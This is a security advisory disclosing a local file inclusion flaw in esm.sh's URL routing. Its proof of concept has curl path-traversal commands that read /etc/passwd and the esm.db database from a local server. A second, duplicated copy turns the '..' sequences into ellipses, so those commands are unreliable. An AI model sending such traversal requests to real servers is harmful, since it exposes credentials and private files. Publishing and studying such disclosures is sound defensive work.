Headline
GHSA-49pv-gwxp-532r: esm.sh has File Inclusion issue
Summary
A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).
Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise. Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.
Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168
Proof of Concept
- Using this default config file that I copy from the repo, the server is running at
http://localhost:9999with this commandgo run server/esmd/main.go --config=config.json
{
"port": 9999,
"npmRegistry": "https://registry.npmjs.org/",
"npmToken": "******"
}
- Trigger the LFI vulnerability by sending this command below to read a local file
# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'
# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'
<img width="3338" height="1906" alt="poc-image" src="https://github.com/user-attachments/assets/f3721e5d-a09c-4227-960a-35279ff52811" />
Remediation
Simply remove any .. in the URL path before actually process the file. See more details in this guide
Credits
Summary
A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).
Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise.
Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.
Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168
Proof of Concept
- Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json
{ "port": 9999, "npmRegistry": "https://registry.npmjs.org/", "npmToken": “******” }
- Trigger the LFI vulnerability by sending this command below to read a local file
read /etc/passwd
curl --path-as-is ‘http://localhost:9999/pr/x/y@99/…/…/…/…/…/…/…/…/…/…/etc/passwd?raw=1&module=1’
or read the database esm.db file
curl --path-as-is ‘http://localhost:9999/pr/x/y@99/…/…/…/…/…/…/…/esm.db?raw=1&module=1’
Remediation
Simply remove any … in the URL path before actually process the file. See more details in this guide
Credits
- Ai Ho (Jessie)
- CL Yang
References
- GHSA-49pv-gwxp-532r
- https://nvd.nist.gov/vuln/detail/CVE-2025-59341
- esm-dev/esm.sh@492de92
- https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168